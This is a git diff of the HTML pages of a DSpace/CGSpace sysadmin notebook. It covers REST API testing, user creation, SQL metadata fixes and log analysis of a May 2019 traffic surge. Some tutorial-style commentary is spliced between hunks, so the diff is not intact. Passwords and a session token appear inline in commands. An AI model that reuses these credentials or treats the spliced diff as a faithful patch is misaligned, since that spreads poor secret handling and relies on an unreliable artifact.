    $ curl -f -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/login" -d '{"email":"example@me.com","password":"fuuuuu"}'
    -$ curl -f -H "Content-Type: application/json" -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -X GET "https://dspacetest.cgiar.org/rest/status"
    -$ curl -f -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
    +
    $ curl -f -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/login" -d '{"email":"example@me.com","password":"fuuuuu"}'
    +$ curl -f -H "Content-Type: application/json" -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -X GET "https://dspacetest.cgiar.org/rest/status"
    +$ curl -f -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
     
    • I created a normal user for Carlos to try as an unprivileged user:
    -
    $ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
    +
    $ dspace user --add --givenname Carlos --surname Tejo --email blah@blah.com --password 'ddmmdd'
     
    • But still I get the HTTP 401 and I have no idea which item is causing it
    • I enabled more verbose logging in ItemsResource.java and now I can at least see the item ID that causes the failure…
    @@ -1212,7 +1212,7 @@ $ curl -f -H "rest-dspace-token: b43d41a6-5ac1-455d-b49a-616b8debc25b"
      • Export a list of authors for Peter to look through:
      -
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
      +
      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-04-26-all-authors.csv with csv header;
       COPY 65752
       

      2019-04-28

        @@ -1262,11 +1262,11 @@ COPY 65752
         spa | 2
             | 1074345
         (11 rows)
        -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
        +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
         UPDATE 360295
        -dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
        +dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
         UPDATE 1074345
        -dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
        +dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
         UPDATE 14
      • Then I exported the whole repository as CSV, imported it into OpenRefine, removed a few unneeded columns, exported it, zipped it down to 36MB, and emailed a link to Carlos
      • diff --git a/docs/2019-05/index.html b/docs/2019-05/index.html
        index 172bbf571..b275efb6d 100644
        --- a/docs/2019-05/index.html
        +++ b/docs/2019-05/index.html
        @@ -48,7 +48,7 @@ DELETE 1
         But after this I tried to delete the item from the XMLUI and it is still present…
         "/>
        -
        +
        @@ -168,7 +168,7 @@ dspace=# DELETE FROM item WHERE item_id=74648;
    -
    $ curl -f -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
    +
    $ curl -f -H "Content-Type: application/json" -X POST "http://localhost:8080/rest/items/find-by-metadata-field" -d '{"key":"cg.subject.cpwf", "value":"WATER MANAGEMENT","language": "en_US"}'
     curl: (22) The requested URL returned error: 401 Unauthorized
     
    • The DSpace log shows the item ID (because I modified the error text):
    • @@ -282,52 +282,52 @@ Please see the DSpace documentation for assistance.
      • The number of unique sessions today is ridiculously high compared to the last few days considering it’s only 12:30PM right now:
      -
      $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
      +
      $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-06 | sort | uniq | wc -l
       101108
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-05 | sort | uniq | wc -l
       14618
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-04 | sort | uniq | wc -l
       14946
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-03 | sort | uniq | wc -l
       6410
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-02 | sort | uniq | wc -l
       7758
      -$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
      +$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-05-01 | sort | uniq | wc -l
       20528
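The per-day commands above differ only in the date, so the same pipeline can be wrapped in a small function and run in a loop. This is a minimal sketch: `count_sessions` is a hypothetical helper name, and the log lines are invented sample data in a scratch directory rather than real CGSpace logs:

```shell
# Count unique session IDs in one DSpace log file
count_sessions() {
    grep -o -E 'session_id=[A-Z0-9]{32}' "$1" | sort -u | wc -l | tr -d ' '
}

# Demo data in a scratch directory (hypothetical log lines, not real CGSpace logs)
logdir=$(mktemp -d)
printf '%s\n' \
    'INFO session_id=0123456789ABCDEF0123456789ABCDEF ip_addr=192.0.2.10' \
    'INFO session_id=0123456789ABCDEF0123456789ABCDEF ip_addr=192.0.2.10' \
    'INFO session_id=FEDCBA9876543210FEDCBA9876543210 ip_addr=192.0.2.11' \
    > "$logdir/dspace.log.2019-05-06"
printf '%s\n' \
    'INFO session_id=AAAABBBBCCCCDDDDEEEEFFFF00001111 ip_addr=192.0.2.12' \
    > "$logdir/dspace.log.2019-05-05"

# One line of output per day instead of one command per day
for day in 06 05; do
    echo "2019-05-$day $(count_sessions "$logdir/dspace.log.2019-05-$day")"
done
```

Here `sort -u` does the same job as `sort | uniq`, and printing the date next to each count makes the days easier to compare at a glance.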
       
      • The number of unique IP addresses from 2 to 6 AM this morning is already several times higher than the average for that time of the morning this past week:
      -
      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +
      # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       7127
      -# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '05/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1231
      -# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '04/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1255
      -# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '03/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1736
      -# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '02/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1573
      -# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.5.gz /var/log/nginx/access.log.6.gz | grep -E '01/May/2019:(02|03|04|05|06)' | awk '{print $1}' | sort | uniq | wc -l
       1410
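To make the time window explicit: the pattern `(02|03|04|05|06)` matches the hour field, so it covers 02:00:00 through 06:59:59. The sketch below runs the same filter on a few invented access log lines (the IPs, paths, and timezone offset are placeholders) to show which requests fall inside the window:

```shell
# Hypothetical nginx access log lines; the client IP is the first field
access_log=$(cat <<'EOF'
192.0.2.1 - - [06/May/2019:01:59:59 +0200] "GET /handle/10568/1 HTTP/1.1" 200 512
192.0.2.1 - - [06/May/2019:02:00:00 +0200] "GET /handle/10568/1 HTTP/1.1" 200 512
192.0.2.2 - - [06/May/2019:06:59:59 +0200] "GET /handle/10568/2 HTTP/1.1" 200 512
192.0.2.2 - - [06/May/2019:03:15:00 +0200] "GET /handle/10568/3 HTTP/1.1" 200 512
192.0.2.3 - - [06/May/2019:07:00:00 +0200] "GET /handle/10568/4 HTTP/1.1" 200 512
EOF
)

# Keep requests whose hour is 02 to 06, take the IP column, and count distinct values
unique_ips=$(printf '%s\n' "$access_log" \
    | grep -E '06/May/2019:(02|03|04|05|06)' \
    | awk '{print $1}' | sort -u | wc -l | tr -d ' ')
echo "$unique_ips"
```

The 01:59:59 and 07:00:00 requests are excluded, and the two requests from 192.0.2.2 count once.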
       
      • Just this morning between the hours of 2 and 6 the number of unique sessions was very high compared to previous mornings:
      -
      $ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2019-05-06 | grep -E '2019-05-06 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       83650
      -$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-05 | grep -E '2019-05-05 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2547
      -$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-04 | grep -E '2019-05-04 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2574
      -$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-03 | grep -E '2019-05-03 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2911
      -$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-02 | grep -E '2019-05-02 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       2704
      -$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       3699
       
      • Most of the requests were GETs:
      -
      # cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E "(GET|HEAD|POST|PUT)" | sort | uniq -c | sort -n
      +
      # cat /var/log/nginx/{access,library-access}.log /var/log/nginx/{access,library-access}.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E "(GET|HEAD|POST|PUT)" | sort | uniq -c | sort -n
             1 PUT
            98 POST
          2845 HEAD
      @@ -336,19 +336,19 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
       
    • I’m not exactly sure what happened this morning, but it looks like some legitimate user traffic—perhaps someone launched a new publication and it got a bunch of hits?
    • Looking again, I see 84,000 requests to /handle this morning (not including logs for library.cgiar.org because those get an HTTP 301 redirect to CGSpace and appear here in access.log):
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E " /handle/[0-9]+/[0-9]+"
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -c -o -E " /handle/[0-9]+/[0-9]+"
     84350
     
    • But it would be difficult to find a pattern for those requests because they cover 78,000 unique Handles (ie direct browsing of items, collections, or communities) and only 2,492 discover/browse (total, not unique):
    -
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+ HTTP" | sort | uniq | wc -l
    +
    # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+ HTTP" | sort | uniq | wc -l
     78104
    -# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+/(discover|browse)" | wc -l
    +# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '06/May/2019:(02|03|04|05|06)' | grep -o -E " /handle/[0-9]+/[0-9]+/(discover|browse)" | wc -l
     2492
     
    • In other news, I see some IP is making several requests per second to the exact same REST API endpoints, for example:
    -
    # grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
    +
    # grep /rest/handle/10568/3703?expand=all rest.log | awk '{print $1}' | sort | uniq -c
           3 2a01:7e00::f03c:91ff:fe0a:d645
         113 63.32.242.35
     
      @@ -363,28 +363,28 @@ $ cat dspace.log.2019-05-01 | grep -E '2019-05-01 (02|03|04|05|06):' | grep -o -
      • The total number of unique IPs on CGSpace yesterday was almost 14,000, which is several thousand higher than previous day totals:
      -
      # zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
      +
      # zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep -E '06/May/2019' | awk '{print $1}' | sort | uniq | wc -l
       13969
      -# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep -E '05/May/2019' | awk '{print $1}' | sort | uniq | wc -l
       5936
      -# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.3.gz /var/log/nginx/access.log.4.gz | grep -E '04/May/2019' | awk '{print $1}' | sort | uniq | wc -l
       6229
      -# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
      +# zcat --force /var/log/nginx/access.log.4.gz /var/log/nginx/access.log.5.gz | grep -E '03/May/2019' | awk '{print $1}' | sort | uniq | wc -l
       8051
       
      • Total number of sessions yesterday was much higher compared to days last week:
      -
      $ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +
      $ cat dspace.log.2019-05-06 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       144160
      -$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-05 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       57269
      -$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-04 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       58648
      -$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-03 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       27883
      -$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-02 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       26996
      -$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
      +$ cat dspace.log.2019-05-01 | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
       61866
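One thing to keep in mind when comparing these totals with the unique session counts from earlier: the commands above use `grep -E` without `-o`, so `uniq` sees whole log lines rather than just the session IDs. A small sketch with two invented log lines from the same session shows the difference:

```shell
# Two hypothetical log lines that belong to the same session
sample=$(cat <<'EOF'
2019-05-06 02:00:01 INFO session_id=0123456789ABCDEF0123456789ABCDEF view_item
2019-05-06 02:00:02 INFO session_id=0123456789ABCDEF0123456789ABCDEF view_bitstream
EOF
)

# Without -o, grep prints whole lines, so uniq sees two different lines
lines=$(printf '%s\n' "$sample" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l | tr -d ' ')

# With -o, grep prints only the matched session ID, so uniq sees one value
sessions=$(printf '%s\n' "$sample" | grep -o -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l | tr -d ' ')

echo "distinct lines: $lines, distinct sessions: $sessions"
```

So the figures here are probably best read as distinct log lines that mention a session, which still works as a day-to-day comparison but is not the same measure as the `-o` counts.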
       
      • The usage statistics seem to agree that yesterday was crazy:
      • @@ -423,9 +423,9 @@ Please see the DSpace documentation for assistance.
      • Help Moayad with certbot-auto for Let’s Encrypt scripts on the new AReS server (linode20)
      • Normalize all text_lang values for metadata on CGSpace and DSpace Test (as I had tested last month):
      -
      UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
      -UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
      -UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
      +
      UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
      +UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
      +UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
       
      • Send Francesca Giampieri from Bioversity a CSV export of all their items issued in 2018
          @@ -454,7 +454,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
        • All of the IPs from these networks are using generic user agents like this, but MANY more, and they change many times:
        -
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36"
        +
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2703.0 Safari/537.36"
         
        • I found a blog post from 2018 detailing an attack from a DDoS service that matches our pattern exactly
        • They specifically mention:
        • @@ -473,7 +473,7 @@ UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata
          • I see that the Unpaywall bot is responsible for a few thousand XMLUI sessions every day (IP addresses come from nginx access.log):
          -
          $ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l   
          +
          $ cat dspace.log.2019-05-11 | grep -E 'ip_addr=(100.26.206.188|100.27.19.233|107.22.98.199|174.129.156.41|18.205.243.110|18.205.245.200|18.207.176.164|18.207.209.186|18.212.126.89|18.212.5.59|18.213.4.150|18.232.120.6|18.234.180.224|18.234.81.13|3.208.23.222|34.201.121.183|34.201.241.214|34.201.39.122|34.203.188.39|34.207.197.154|34.207.232.63|34.207.91.147|34.224.86.47|34.227.205.181|34.228.220.218|34.229.223.120|35.171.160.166|35.175.175.202|3.80.201.39|3.81.120.70|3.81.43.53|3.84.152.19|3.85.113.253|3.85.237.139|3.85.56.100|3.87.23.95|3.87.248.240|3.87.250.3|3.87.62.129|3.88.13.9|3.88.57.237|3.89.71.15|3.90.17.242|3.90.68.247|3.91.44.91|3.92.138.47|3.94.250.180|52.200.78.128|52.201.223.200|52.90.114.186|52.90.48.73|54.145.91.243|54.160.246.228|54.165.66.180|54.166.219.216|54.166.238.172|54.167.89.152|54.174.94.223|54.196.18.211|54.198.234.175|54.208.8.172|54.224.146.147|54.234.169.91|54.235.29.216|54.237.196.147|54.242.68.231|54.82.6.96|54.87.12.181|54.89.217.141|54.89.234.182|54.90.81.216|54.91.104.162)' | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l   
           2206
           
          • I added “Unpaywall” to the list of bots in the Tomcat Crawler Session Manager Valve
          • @@ -519,20 +519,20 @@ COPY 995
          • Peter sent me a bunch of fixes for investors from yesterday
          • I did a quick check in Open Refine (trim and collapse whitespace, clean smart quotes, etc) and then applied them on CGSpace:
          -
          $ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
          -$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
          +
          $ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
          +$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
           
          • Then I started a full Discovery re-indexing:
          -
          $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
          +
          $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
           $ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
           
          • I was going to make a new controlled vocabulary of the top 100 terms after these corrections, but I noticed a bunch of duplicates and variations when I sorted them alphabetically
          • Instead, I exported a new list and asked Peter to look at it again
          • Apply Peter’s new corrections on DSpace Test and CGSpace:
          -
          $ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
          -$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
          +
          $ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
          +$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
           
          • Then I re-exported the sponsors and took the top 100 to update the existing controlled vocabulary (#423)
              @@ -573,16 +573,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dsp
          -
          $ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
          +
          $ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
           
          • Then start a full Discovery re-indexing on each server:
          -
          $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"                                   
          +
          $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"                                   
           $ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
           
          • Export new list of all authors from CGSpace database to send to Peter:
          -
          dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
          +
          dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
           COPY 64871
           
          • Run all system updates on DSpace Test (linode19) and reboot it
          • @@ -609,7 +609,7 @@ COPY 64871
          • For now I just created an eperson with her personal email address until I have time to check LDAP to see what’s up with her CGIAR account:
          -
          $ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
          +
          $ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
           
          diff --git a/docs/2019-06/index.html b/docs/2019-06/index.html
          index f43b00d50..ee49b7231 100644
          --- a/docs/2019-06/index.html
          +++ b/docs/2019-06/index.html
          @@ -34,7 +34,7 @@ Run system updates on CGSpace (linode18) and reboot it
           Skype with Marie-Angélique and Abenet about CG Core v2
           "/>
          -
          +
          @@ -203,7 +203,7 @@ $ csvcut -l -c 0 /tmp/countries.csv > 2019-06-10-countries.csv
          • Get a list of all the unique AGROVOC subject terms in IITA’s data and export it to a text file so I can validate them with my agrovoc-lookup.py script:
          -
          $ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u > iita-agrovoc.txt
          +
          $ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u > iita-agrovoc.txt
           $ ./agrovoc-lookup.py -i iita-agrovoc.txt -om iita-agrovoc-matches.txt -or iita-agrovoc-rejects.txt
           $ wc -l iita-agrovoc*
             402 iita-agrovoc-matches.txt
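The splitting step in the pipeline above can be tried on its own with a few made-up subject cells. This sketch uses awk for the `||` split instead of `sed 's/||/\n/g'`, on the assumption that not every sed implementation treats `\n` in the replacement as a newline; the sample terms are placeholders:

```shell
# Hypothetical dc.subject column as csvcut might print it: a header, then one cell per row
subjects=$(cat <<'EOF'
dc.subject
MAIZE||CASSAVA
CASSAVA||YAMS
EOF
)

# Split multi-value cells on "||", drop the header, and keep each term once
terms=$(printf '%s\n' "$subjects" \
    | awk '{ gsub(/\|\|/, "\n"); print }' \
    | grep -v dc.subject | sort -u)
printf '%s\n' "$terms"
```

Each term ends up on its own line exactly once, which is the shape a one-term-per-line lookup script would expect.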
          @@ -216,7 +216,7 @@ $ wc -l iita-agrovoc*
           
          • Then make a new list to use with reconcile-csv by adding line numbers with csvcut and changing the line number header to id:
          -
          $ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' > 2019-06-10-subjects-matched.csv
          +
          $ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' > 2019-06-10-subjects-matched.csv
           

          2019-06-20

